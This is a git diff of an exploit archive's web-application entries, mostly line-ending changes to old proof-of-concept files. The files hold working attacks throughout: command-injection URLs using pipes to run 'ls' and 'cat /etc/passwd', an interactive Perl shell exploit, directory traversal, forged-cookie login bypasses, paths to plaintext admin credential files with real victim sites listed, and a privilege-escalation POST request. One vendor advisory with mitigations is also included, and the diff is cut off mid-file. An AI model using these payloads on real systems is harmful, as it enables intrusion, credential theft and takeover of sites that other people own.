/_/ \_\ \____| (_) \____| \____| - - -Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability -Script : ): -POC : - |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down_file - |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file - |---> Open By Mozilla Firefox -Dork : http://www.google.com.ly/search?hl=ar&q=SPBOARD+v4.5 - - ____ _ _ __ __ - / ___| ___ | | __| | | \/ | - | | _ / _ \ | | / _` | | |\/| | - | |_| | | (_) | | |___ | (_| | | | | | - \____| \___/ |_____| \__,_| _____ |_| |_| - |_____| - -# milw0rm.com [2008-10-29] + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + + +Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability +Script : ): +POC : + |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down_file + |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file + |---> Open By Mozilla Firefox +Dork : http://www.google.com.ly/search?hl=ar&q=SPBOARD+v4.5 + + ____ _ _ __ __ + / ___| ___ | | __| | | \/ | + | | _ / _ \ | | / _` | | |\/| | + | |_| | | (_) | | |___ | (_| | | | | | + \____| \___/ |_____| \__,_| _____ |_| |_| + |_____| + +# milw0rm.com [2008-10-29] diff --git a/platforms/cgi/webapps/7404.txt b/platforms/cgi/webapps/7404.txt index 904e08e29..6c01b099c 100755 --- a/platforms/cgi/webapps/7404.txt +++ b/platforms/cgi/webapps/7404.txt @@ -1,27 +1,27 @@ -Software : HTMPL v1.11 -Download Link : http://vmeste.org/templ_ex/doc/1.html -Vulnrability : Command Execution -Severity : High -Author : ZeN -Website : http://dusecurity.com / http://darkcode.me/ - -Exploit : -site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd - - -A few other little..... tricks -The admins password is kept plaintext in the file 'adminpass', you can just access it directly -in the same directory. - -Thanks str0ke ;) - -Shouts to : -DU Security Group -DarkCoders -WL-Group -Milw0rm -EnigmaGroup -IWannaHack -HackHound - -# milw0rm.com [2008-12-10] +Software : HTMPL v1.11 +Download Link : http://vmeste.org/templ_ex/doc/1.html +Vulnrability : Command Execution +Severity : High +Author : ZeN +Website : http://dusecurity.com / http://darkcode.me/ + +Exploit : +site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd + + +A few other little..... tricks +The admins password is kept plaintext in the file 'adminpass', you can just access it directly +in the same directory. + +Thanks str0ke ;) + +Shouts to : +DU Security Group +DarkCoders +WL-Group +Milw0rm +EnigmaGroup +IWannaHack +HackHound + +# milw0rm.com [2008-12-10] diff --git a/platforms/cgi/webapps/7753.pl b/platforms/cgi/webapps/7753.pl index 61c5621fe..8a8d28562 100755 --- a/platforms/cgi/webapps/7753.pl +++ b/platforms/cgi/webapps/7753.pl @@ -1,53 +1,53 @@ -#!/usr/bin/perl -use IO::Socket; - -print q{ - -HSpell v1.1 Command Execution Exploit - -Theres a 1000 ways to improve this exploit, -but I really couldn't be fucked with it. - -Made By ZeN -http://dusecurity.com/ -http://darkcode.me/ - -}; - - -$host = 'site.com'; -$port = '80'; -$path = '/cgi-bin/cilla.cgi'; - -ShellMe: - -print "\nh4x0r~> "; -$cmd = ; -chop ($cmd); - -$cmd =~ s/\ /+/g; - - -$header = "GET ".$path."?root=pwnt%3B+".$cmd."&binyan=%F7%EC HTTP/1.1\r\n"; -$header = $header."Host: ".$host."\r\n"; -$header = $header."User-Agent: DUSecurity Group\r\n"; -$header = $header."Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; -$header = $header."Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; -$header = $header."Accept-Encoding: gzip,deflate\r\n"; -$header = $header."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; -$header = $header."Connection: close\r\n"; -$header = $header."Cache-Control: max-age=0\r\n"; -$header = $header."\r\n"; - - -$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || print "[*] Error!\n"; -print $get1 $header; -$get1->recv($buffer,50000); - -$shell = substr($buffer, 1347); - -print $shell; - -goto ShellMe; - -# milw0rm.com [2009-01-13] +#!/usr/bin/perl +use IO::Socket; + +print q{ + +HSpell v1.1 Command Execution Exploit + +Theres a 1000 ways to improve this exploit, +but I really couldn't be fucked with it. + +Made By ZeN +http://dusecurity.com/ +http://darkcode.me/ + +}; + + +$host = 'site.com'; +$port = '80'; +$path = '/cgi-bin/cilla.cgi'; + +ShellMe: + +print "\nh4x0r~> "; +$cmd = ; +chop ($cmd); + +$cmd =~ s/\ /+/g; + + +$header = "GET ".$path."?root=pwnt%3B+".$cmd."&binyan=%F7%EC HTTP/1.1\r\n"; +$header = $header."Host: ".$host."\r\n"; +$header = $header."User-Agent: DUSecurity Group\r\n"; +$header = $header."Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; +$header = $header."Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; +$header = $header."Accept-Encoding: gzip,deflate\r\n"; +$header = $header."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; +$header = $header."Connection: close\r\n"; +$header = $header."Cache-Control: max-age=0\r\n"; +$header = $header."\r\n"; + + +$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || print "[*] Error!\n"; +print $get1 $header; +$get1->recv($buffer,50000); + +$shell = substr($buffer, 1347); + +print $shell; + +goto ShellMe; + +# milw0rm.com [2009-01-13] diff --git a/platforms/cgi/webapps/8085.txt b/platforms/cgi/webapps/8085.txt index cf5d58322..8e2083b86 100755 --- a/platforms/cgi/webapps/8085.txt +++ b/platforms/cgi/webapps/8085.txt @@ -1,18 +1,18 @@ -######################################################### ---------------------------------------------------------- -Portal Name: i-dreams Mailer -Version : 1.2 Final -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Website: http://Pouya-Server.ir ---------------------------------------------------------- -######################################################### -[Xpl]: -http://site.com/cgi-bin/budmail/data/admin.dat ------------------------------------------- -Victem : -http://www.ttscreens.co.uk -http://www.roadkilleyeware.com ---------------------------------------------------------- -######################################################### - -# milw0rm.com [2009-02-20] +######################################################### +--------------------------------------------------------- +Portal Name: i-dreams Mailer +Version : 1.2 Final +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Website: http://Pouya-Server.ir +--------------------------------------------------------- +######################################################### +[Xpl]: +http://site.com/cgi-bin/budmail/data/admin.dat +------------------------------------------ +Victem : +http://www.ttscreens.co.uk +http://www.roadkilleyeware.com +--------------------------------------------------------- +######################################################### + +# milw0rm.com [2009-02-20] diff --git a/platforms/cgi/webapps/8086.txt b/platforms/cgi/webapps/8086.txt index 976452a19..ae19c846a 100755 --- a/platforms/cgi/webapps/8086.txt +++ b/platforms/cgi/webapps/8086.txt @@ -1,19 +1,19 @@ -######################################################### ---------------------------------------------------------- -Portal Name: i-dreams.net GB -Version : 5.4 Final -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Website: http://Pouya-Server.ir ---------------------------------------------------------- -######################################################### -[Xpl]: -http://site.com/firebook/data/admdat/admin.dat ------------------------------------------- -Victem : -http://www.elsapo77.com -http://www.astro-partner.eu/cgi-bin -http://www.zarembowicz.de/cgi-bin ---------------------------------------------------------- -######################################################### - -# milw0rm.com [2009-02-20] +######################################################### +--------------------------------------------------------- +Portal Name: i-dreams.net GB +Version : 5.4 Final +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Website: http://Pouya-Server.ir +--------------------------------------------------------- +######################################################### +[Xpl]: +http://site.com/firebook/data/admdat/admin.dat +------------------------------------------ +Victem : +http://www.elsapo77.com +http://www.astro-partner.eu/cgi-bin +http://www.zarembowicz.de/cgi-bin +--------------------------------------------------------- +######################################################### + +# milw0rm.com [2009-02-20] diff --git a/platforms/cgi/webapps/8087.txt b/platforms/cgi/webapps/8087.txt index 8a8de6b84..94f620575 100755 --- a/platforms/cgi/webapps/8087.txt +++ b/platforms/cgi/webapps/8087.txt @@ -1,16 +1,16 @@ -######################################################### ---------------------------------------------------------- -Portal Name: i-dreams.net GB Server -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Website: http://Pouya-Server.ir ---------------------------------------------------------- -######################################################### -[Xpl]: -http://site.com/[Path]/admdat/admin.dat ------------------------------------------- -Victem : -http://www.comp-tech.at/guestbook/users/demo ---------------------------------------------------------- -######################################################### - -# milw0rm.com [2009-02-20] +######################################################### +--------------------------------------------------------- +Portal Name: i-dreams.net GB Server +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Website: http://Pouya-Server.ir +--------------------------------------------------------- +######################################################### +[Xpl]: +http://site.com/[Path]/admdat/admin.dat +------------------------------------------ +Victem : +http://www.comp-tech.at/guestbook/users/demo +--------------------------------------------------------- +######################################################### + +# milw0rm.com [2009-02-20] diff --git a/platforms/cgi/webapps/8247.txt b/platforms/cgi/webapps/8247.txt index f9399a6fc..f626ac1b3 100755 --- a/platforms/cgi/webapps/8247.txt +++ b/platforms/cgi/webapps/8247.txt @@ -1,164 +1,164 @@ -Emory University UTS Security Advisory EMORY-2009-01 - -Topic: Command Execution in Hannon Hill Cascade Server - -Original release date: March 19, 2009 - -SUMMARY -======= - -Hannon Hill's Cascade Server product is vulnerable to a command -execution vulnerability. An attacker with access to an unprivileged -account within Cascade Server could exploit this vulnerability to run -arbitrary commands on the system with the privileges of the user who -started Cascade Server. - -AFFECTED SOFTWARE -================= - -* Cascade Server, all versions - -IMPACT -====== - -An attacker with access to an unprivileged account within Cascade -Server could exploit this vulnerability to run arbitrary commands on -the system with the privileges of the user who started Cascade Server. - -The privileges of that user are necessarily sufficient to gain full -administrative control of Cascade Server - elevate privileges, conduct -denial of service, etc. - -DETAILS -======= - -Cascade Server allows its users to write XSLT stylesheets which it -uses to transform XML source data into HTML or other formats. Cascade -Server employs the Apache XML Project's Xalan-Java XSLT processor to -perform these transformations. - -The Xalan-Java site states, "For those situations where you would like -to augment the functionality of XSLT with calls to a procedural -language, Xalan-Java supports the creation and use of extension -elements and extension functions... Extensions written in Java are -directly supported by Xalan-Java." - -Because Cascade Server does not restrict the kind of XSLT code users -are able to enter, any user with access to edit XSLT stylesheets can -cause Cascade Server to execute arbitrary Java code. Using the -java.lang.Runtime class, Java can run shell commands. - -While the privilege level of the Cascade Server process may prevent -an attacker from gaining complete control of the host system, that -privilege level is necessarily sufficient to gain full control of -Cascade Server. - -SOLUTION -======== - -No full solution exists at this time, but see Recommendations, below. - -Hannon Hill is working to develop an official solution, and customers may -wish to monitor its progress using the Hannon Hill ticketing system -(requires a customer account). - -http://support.hannonhill.com/browse/CSCD-4753 - -RECOMMENDATIONS -=============== - -It may be possible to limit exposure in the following ways: - -* Grant the ability to edit XSLT files only to trusted users. - -* Enforce strong passwords for accounts with XSLT editing privileges. -Cascade stores user passwords as base64 encoded SHA1 hashes in the -password field of the cxml_user table, and can be audited with any -SHA1-capable password cracker. For example, to extract hashes from a -MySQL database in a form useable by John the Ripper's -(http://www.openwall.com/john/) raw-sha1 format: - -echo "select userName, password from cxml_user" \ - | mysql cascade \ - | perl -i -ne 'use MIME::Base64; /^(.*?)\t(.*)/ && print "$1:" . unpack("H*", decode_base64($2))."\n"' - -* Run Cascade Server as a user with as few privileges as possible. - -* On UNIX systems, run Cascade Server in a chroot environment. - -EXPLOIT -======= - -This exploit example assumes the ability to create and edit blocks, -stylesheets, and pages. It's also possible to exploit the -vulnerability simply by modifying an existing stylesheet. - -Create a stylesheet with the following contents: - - - - - - - - - -

- Output:
-

- - - -Create an XML block with the following contents, substituting your own -command or commands. - -id -uname -a -... - -Create or edit a page using a template with at least one region defined. -Under the configuration tab, set Block to point to your XML block and -Stylesheet (AKA Layout in Cascade 5.7+) to point to your stylesheet. - -View the layout or preview tab for that page, and you should see the -output of your commands. Note that the above stylesheet is only able -to display the first line of output. - -ACKNOWLEDGMENTS -=============== - -Thanks to Bradley Wagner and Hannon Hill in general for their quick -initial response to the problem. - -Thanks to Amy Liu and Brett Goodwin of Hannon Hill for their "Advanced -XSLT" talk at the 2008 Cascade Server User's Conference, which -inspired this research. - -DISCLAIMER -========== - -The information in this advisory is provided by Emory as a courtesy -and without any representations or warranties. Recipients are -advised to conduct their own investigation and due diligence before -relying on its contents. - -VULNERABILTY HISTORY -==================== - -2008-10-01 Vulnerability discovered - Hannon Hill notified - Ticket opened in Hannon Hill issue tracker - -2008-10-15 Hannon Hill staff member assigned to the issue - -2009-02-23 Hannon Hill staff member reassigned - -2009-03-19 Initial revision of advisory published - -# milw0rm.com [2009-03-19] +Emory University UTS Security Advisory EMORY-2009-01 + +Topic: Command Execution in Hannon Hill Cascade Server + +Original release date: March 19, 2009 + +SUMMARY +======= + +Hannon Hill's Cascade Server product is vulnerable to a command +execution vulnerability. An attacker with access to an unprivileged +account within Cascade Server could exploit this vulnerability to run +arbitrary commands on the system with the privileges of the user who +started Cascade Server. + +AFFECTED SOFTWARE +================= + +* Cascade Server, all versions + +IMPACT +====== + +An attacker with access to an unprivileged account within Cascade +Server could exploit this vulnerability to run arbitrary commands on +the system with the privileges of the user who started Cascade Server. + +The privileges of that user are necessarily sufficient to gain full +administrative control of Cascade Server - elevate privileges, conduct +denial of service, etc. + +DETAILS +======= + +Cascade Server allows its users to write XSLT stylesheets which it +uses to transform XML source data into HTML or other formats. Cascade +Server employs the Apache XML Project's Xalan-Java XSLT processor to +perform these transformations. + +The Xalan-Java site states, "For those situations where you would like +to augment the functionality of XSLT with calls to a procedural +language, Xalan-Java supports the creation and use of extension +elements and extension functions... Extensions written in Java are +directly supported by Xalan-Java." + +Because Cascade Server does not restrict the kind of XSLT code users +are able to enter, any user with access to edit XSLT stylesheets can +cause Cascade Server to execute arbitrary Java code. Using the +java.lang.Runtime class, Java can run shell commands. + +While the privilege level of the Cascade Server process may prevent +an attacker from gaining complete control of the host system, that +privilege level is necessarily sufficient to gain full control of +Cascade Server. + +SOLUTION +======== + +No full solution exists at this time, but see Recommendations, below. + +Hannon Hill is working to develop an official solution, and customers may +wish to monitor its progress using the Hannon Hill ticketing system +(requires a customer account). + +http://support.hannonhill.com/browse/CSCD-4753 + +RECOMMENDATIONS +=============== + +It may be possible to limit exposure in the following ways: + +* Grant the ability to edit XSLT files only to trusted users. + +* Enforce strong passwords for accounts with XSLT editing privileges. +Cascade stores user passwords as base64 encoded SHA1 hashes in the +password field of the cxml_user table, and can be audited with any +SHA1-capable password cracker. For example, to extract hashes from a +MySQL database in a form useable by John the Ripper's +(http://www.openwall.com/john/) raw-sha1 format: + +echo "select userName, password from cxml_user" \ + | mysql cascade \ + | perl -i -ne 'use MIME::Base64; /^(.*?)\t(.*)/ && print "$1:" . unpack("H*", decode_base64($2))."\n"' + +* Run Cascade Server as a user with as few privileges as possible. + +* On UNIX systems, run Cascade Server in a chroot environment. + +EXPLOIT +======= + +This exploit example assumes the ability to create and edit blocks, +stylesheets, and pages. It's also possible to exploit the +vulnerability simply by modifying an existing stylesheet. + +Create a stylesheet with the following contents: + + + + + + + + + +

+ Output:
+

+ + + +Create an XML block with the following contents, substituting your own +command or commands. + +id +uname -a +... + +Create or edit a page using a template with at least one region defined. +Under the configuration tab, set Block to point to your XML block and +Stylesheet (AKA Layout in Cascade 5.7+) to point to your stylesheet. + +View the layout or preview tab for that page, and you should see the +output of your commands. Note that the above stylesheet is only able +to display the first line of output. + +ACKNOWLEDGMENTS +=============== + +Thanks to Bradley Wagner and Hannon Hill in general for their quick +initial response to the problem. + +Thanks to Amy Liu and Brett Goodwin of Hannon Hill for their "Advanced +XSLT" talk at the 2008 Cascade Server User's Conference, which +inspired this research. + +DISCLAIMER +========== + +The information in this advisory is provided by Emory as a courtesy +and without any representations or warranties. Recipients are +advised to conduct their own investigation and due diligence before +relying on its contents. + +VULNERABILTY HISTORY +==================== + +2008-10-01 Vulnerability discovered + Hannon Hill notified + Ticket opened in Hannon Hill issue tracker + +2008-10-15 Hannon Hill staff member assigned to the issue + +2009-02-23 Hannon Hill staff member reassigned + +2009-03-19 Initial revision of advisory published + +# milw0rm.com [2009-03-19] diff --git a/platforms/cgi/webapps/862.txt b/platforms/cgi/webapps/862.txt index beb22ba8d..de968cb50 100755 --- a/platforms/cgi/webapps/862.txt +++ b/platforms/cgi/webapps/862.txt @@ -1,6 +1,6 @@ Remote Command Execution on: Example I.: www.host-vulnerable.com/includer.cgi?|id| -Example II.: www.host-vulnerable.com/includer.cgi?template=|id| - -# milw0rm.com [2005-03-07] +Example II.: www.host-vulnerable.com/includer.cgi?template=|id| + +# milw0rm.com [2005-03-07] diff --git a/platforms/cgi/webapps/8895.txt b/platforms/cgi/webapps/8895.txt index f88ccfc12..6e6c8fd31 100755 --- a/platforms/cgi/webapps/8895.txt +++ b/platforms/cgi/webapps/8895.txt @@ -1,58 +1,58 @@ -[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 06/06/2009 -[~] -[~] Home: yildirimordulari.com / z0rlu.blogspot.com -[~] -[~] msn: trt-turk@hotmail.com -[~] -[~] N0T: Kpss AnanI .... -[~] ----------------------------------------------------------- - -desc: - -normal login for cookie - -pmadm=dGVzdA; - -if ý do this: - -pmadm=dGVzd(write any thing); - -example: - -pmadm=dGVzdz; - -or - -pmadm=dGVzd123231212313; - -not login - -if ý do wthis: - -pmadm=dGVzd ' or '; - -boom this loggin :D - -exp: - -javascript:document.cookie = "pmadm=dGVzd ' or '; path=/"; - -after you go here: - -http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp - -or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends -[~] -[~] yildirimordulari.com / z0rlu.blogspot.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2009-06-08] +[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 06/06/2009 +[~] +[~] Home: yildirimordulari.com / z0rlu.blogspot.com +[~] +[~] msn: trt-turk@hotmail.com +[~] +[~] N0T: Kpss AnanI .... +[~] ----------------------------------------------------------- + +desc: + +normal login for cookie + +pmadm=dGVzdA; + +if ý do this: + +pmadm=dGVzd(write any thing); + +example: + +pmadm=dGVzdz; + +or + +pmadm=dGVzd123231212313; + +not login + +if ý do wthis: + +pmadm=dGVzd ' or '; + +boom this loggin :D + +exp: + +javascript:document.cookie = "pmadm=dGVzd ' or '; path=/"; + +after you go here: + +http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp + +or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends +[~] +[~] yildirimordulari.com / z0rlu.blogspot.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2009-06-08] diff --git a/platforms/cgi/webapps/8987.txt b/platforms/cgi/webapps/8987.txt index 6e02d6038..61b14a30b 100755 --- a/platforms/cgi/webapps/8987.txt +++ b/platforms/cgi/webapps/8987.txt @@ -1,35 +1,35 @@ --------------------------------------------- - -MIDAS Insecure Cookie Handling Vulnerability - --------------------------------------------- - -Author.: HxH - -Contact: HxH[at]live[dot]at - ---------------------------- - -Script.: MIDAS - -Home...: http://mid.as - -------------------------------------------------------------------------------------------------- - -Exploit: javascript:document.cookie="MIDAS=admin|Administrator|1|data0n9a|en-US|Default; path=/"; - -Note...: After make cookie go direct to http://[website]/[script]/level1.pl?x=0 - -------------------------------------------------------------------------------------------------- - -Demo...: http://demo.mid.as - -Panel..: http://demo.mid.as/level1.pl?x=0 - ------------------------------------------ - -Greetz.: ~ Jiko ~ Sniper Code - ------------------------------ - -# milw0rm.com [2009-06-22] +-------------------------------------------- + +MIDAS Insecure Cookie Handling Vulnerability + +-------------------------------------------- + +Author.: HxH + +Contact: HxH[at]live[dot]at + +--------------------------- + +Script.: MIDAS + +Home...: http://mid.as + +------------------------------------------------------------------------------------------------- + +Exploit: javascript:document.cookie="MIDAS=admin|Administrator|1|data0n9a|en-US|Default; path=/"; + +Note...: After make cookie go direct to http://[website]/[script]/level1.pl?x=0 + +------------------------------------------------------------------------------------------------- + +Demo...: http://demo.mid.as + +Panel..: http://demo.mid.as/level1.pl?x=0 + +----------------------------------------- + +Greetz.: ~ Jiko ~ Sniper Code + +----------------------------- + +# milw0rm.com [2009-06-22] diff --git a/platforms/cgi/webapps/9074.txt b/platforms/cgi/webapps/9074.txt index 37ccf24ac..457eee802 100755 --- a/platforms/cgi/webapps/9074.txt +++ b/platforms/cgi/webapps/9074.txt @@ -1,58 +1,58 @@ -Affected product ----------------- - -Sourcefire 3D Sensor and Defense Center 4.8.x - -Tested on 4.8.0.3 and 4.8.0.4, 3D Sensor 2500 & DC 1000 -All 4.8.x releases, up to and including 4.8.1, confirmed vulnerable by sourcefire. - - -Vulnerability details ---------------------- - -A privilege escalation vulnerability found in the Sensor and the DC web based management interfaces allows any local account -to take over the appliances administrator role. -While the "user.cgi" PERL script correctly validates that incoming requests belong to an authenticated session, in such a case -it also blindly grants read/write access to all accounts configuration with no regard for the role of the request's originator. -Therefore a user with even the lowest level of access (ie. without any role configured) is able to promote himself as administrator -and/or change others roles and account parameters at will. -Depending of the role or roles initially configured for this user, access to the user management page may not be visible -into the interface's layout however the underlying script itself is still reachable and can be invoked "by hand". - -Let's now consider a malicious operator named 'foobar' whose role has been restricted to "Event analyst (read only)". -He would first log in to the appliance using his own credentials in order to get an authenticated session cookie (CGISESSID=xxxxxxxxxxxxxxxxxx) -then he could send a forged POST request similar to the one below: - -POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1 -User-Agent: xxxxxx -Keep-Alive: 300 -Connection: Keep-alive -Cookie: CGISESSID=xxxxxxxxxxxxxxxxxx -Content-Type: application/x-www-form-urlencoded -Content-length: 56 - -mode=edit&username=foobar&admin=%24admin&action_add=Save - -He would thereafter be promoted to administrator by the appliance with full access into the management interface. - -As a final note, several other scripts were reported being affected by the same vulnerability after investigation from the vendor. - - -Resolution ----------- - -Upgrade your appliance's software to 4.8.2 available from the Sourcefire's support website located at https://support.sourcefire.com/ - - -Disclosure timeline -------------------- - -2009-05-05: Vulnerability discovered and reported to Sourcefire. -2009-06-30: 4.8.2 released by Sourcefire. -2009-07-01: Public disclosure. - - - -Gregory Duchemin - -# milw0rm.com [2009-07-02] +Affected product +---------------- + +Sourcefire 3D Sensor and Defense Center 4.8.x + +Tested on 4.8.0.3 and 4.8.0.4, 3D Sensor 2500 & DC 1000 +All 4.8.x releases, up to and including 4.8.1, confirmed vulnerable by sourcefire. + + +Vulnerability details +--------------------- + +A privilege escalation vulnerability found in the Sensor and the DC web based management interfaces allows any local account +to take over the appliances administrator role. +While the "user.cgi" PERL script correctly validates that incoming requests belong to an authenticated session, in such a case +it also blindly grants read/write access to all accounts configuration with no regard for the role of the request's originator. +Therefore a user with even the lowest level of access (ie. without any role configured) is able to promote himself as administrator +and/or change others roles and account parameters at will. +Depending of the role or roles initially configured for this user, access to the user management page may not be visible +into the interface's layout however the underlying script itself is still reachable and can be invoked "by hand". + +Let's now consider a malicious operator named 'foobar' whose role has been restricted to "Event analyst (read only)". +He would first log in to the appliance using his own credentials in order to get an authenticated session cookie (CGISESSID=xxxxxxxxxxxxxxxxxx) +then he could send a forged POST request similar to the one below: + +POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1 +User-Agent: xxxxxx +Keep-Alive: 300 +Connection: Keep-alive +Cookie: CGISESSID=xxxxxxxxxxxxxxxxxx +Content-Type: application/x-www-form-urlencoded +Content-length: 56 + +mode=edit&username=foobar&admin=%24admin&action_add=Save + +He would thereafter be promoted to administrator by the appliance with full access into the management interface. + +As a final note, several other scripts were reported being affected by the same vulnerability after investigation from the vendor. + + +Resolution +---------- + +Upgrade your appliance's software to 4.8.2 available from the Sourcefire's support website located at https://support.sourcefire.com/ + + +Disclosure timeline +------------------- + +2009-05-05: Vulnerability discovered and reported to Sourcefire. +2009-06-30: 4.8.2 released by Sourcefire. +2009-07-01: Public disclosure. + + + +Gregory Duchemin + +# milw0rm.com [2009-07-02] diff --git a/platforms/cgi/webapps/9140.txt b/platforms/cgi/webapps/9140.txt index 49e436e8d..85232fe06 100755 --- a/platforms/cgi/webapps/9140.txt +++ b/platforms/cgi/webapps/9140.txt @@ -1,7 +1,7 @@ -Discovered by cibbao - -PoC: - -/cgi-bin/DJcalendar.cgi?TEMPLATE=/../../../../../../../etc/passwd - -# milw0rm.com [2009-07-14] +Discovered by cibbao + +PoC: + +/cgi-bin/DJcalendar.cgi?TEMPLATE=/../../../../../../../etc/passwd + +# milw0rm.com [2009-07-14] diff --git a/platforms/cgi/webapps/9357.txt b/platforms/cgi/webapps/9357.txt index f1f318a1e..f09c795a7 100755 --- a/platforms/cgi/webapps/9357.txt +++ b/platforms/cgi/webapps/9357.txt @@ -1,34 +1,34 @@ -A while back I was playing around with Perl$hop, which if you are not -aware, is an e-commerce script developed by Waverider Systems. XSS -(Cross Site Scripting), Directory Traversal, Code Execution, and more! -Wow, that sure is a lot of vulnerabilities for one product. It would -seem as if the developers had little to no regard for web application -security. Which, were this not a free product, I might comment further -upon. As this is not the case, allow me to continue. - -One of the initial vulnerabilities I noticed when viewing the source -code to a product page was the existence of a hidden input field named -ITEM_PRICE. Now we simply download the source to the page, edit the -hidden value of input field ITEM_PRICE to whatever we want, as an -example value=?0.01?, and save. Reopen and purchase the item. The -following checkout page will verify your success or lack thereof. So we -can set our own price, fun stuff! - -Next we examine perlshop.cgi and notice that the script does not -properly sanitize user input. After a little variable injection we find -that the GET variable ?thispage? is vulnerable to a directory traversal -and potential code execution depending on the environment. If you were -hoping for an exploit example, here it is: - -http://target/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar - -And lastly, to save myself the trouble, I?ll just say that the GET -variable CUR, thispage, LANG, and most likely others contain cross site -scripting vulnerabilities. XSS vulnerabilities are not nearly as -critical as the aforementioned directory traversal and code execution -vulnerabilities though they should still be taken seriously as session -fixation attempts could allow a hacker to hijack accounts. - -www.shadow.net - -# milw0rm.com [2009-08-04] +A while back I was playing around with Perl$hop, which if you are not +aware, is an e-commerce script developed by Waverider Systems. XSS +(Cross Site Scripting), Directory Traversal, Code Execution, and more! +Wow, that sure is a lot of vulnerabilities for one product. It would +seem as if the developers had little to no regard for web application +security. Which, were this not a free product, I might comment further +upon. As this is not the case, allow me to continue. + +One of the initial vulnerabilities I noticed when viewing the source +code to a product page was the existence of a hidden input field named +ITEM_PRICE. Now we simply download the source to the page, edit the +hidden value of input field ITEM_PRICE to whatever we want, as an +example value=?0.01?, and save. Reopen and purchase the item. The +following checkout page will verify your success or lack thereof. So we +can set our own price, fun stuff! + +Next we examine perlshop.cgi and notice that the script does not +properly sanitize user input. After a little variable injection we find +that the GET variable ?thispage? is vulnerable to a directory traversal +and potential code execution depending on the environment. If you were +hoping for an exploit example, here it is: + +http://target/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar + +And lastly, to save myself the trouble, I?ll just say that the GET +variable CUR, thispage, LANG, and most likely others contain cross site +scripting vulnerabilities. XSS vulnerabilities are not nearly as +critical as the aforementioned directory traversal and code execution +vulnerabilities though they should still be taken seriously as session +fixation attempts could allow a hacker to hijack accounts. + +www.shadow.net + +# milw0rm.com [2009-08-04] diff --git a/platforms/cgi/webapps/954.pl b/platforms/cgi/webapps/954.pl index 83a321baf..47b2434b0 100755 --- a/platforms/cgi/webapps/954.pl +++ b/platforms/cgi/webapps/954.pl @@ -67,6 +67,6 @@ print "If connect back shell not found:\n"; print "- you do not have privileges to write in /tmp\n"; print "- Shell not vulnerable\n\n\n"; print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu us.ircnet.org\n\n\n"; - - -# milw0rm.com [2005-04-25] + + +# milw0rm.com [2005-04-25] diff --git a/platforms/cgi/webapps/980.pl b/platforms/cgi/webapps/980.pl index 1a8db5a19..394058fbe 100755 --- a/platforms/cgi/webapps/980.pl +++ b/platforms/cgi/webapps/980.pl @@ -166,6 +166,6 @@ print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n Command: SCAN URL HELP QUIT"; print "\n\n\n\n\n\n\n\n\n\n\n"; -}; - -# milw0rm.com [2005-05-04] +}; + +# milw0rm.com [2005-05-04] diff --git a/platforms/freebsd/dos/8259.c b/platforms/freebsd/dos/8259.c index a7664d51a..7ef17fbc0 100755 --- a/platforms/freebsd/dos/8259.c +++ b/platforms/freebsd/dos/8259.c @@ -1,10 +1,10 @@ -/* FreeBSD 7.x local kernel panic as mentioned in 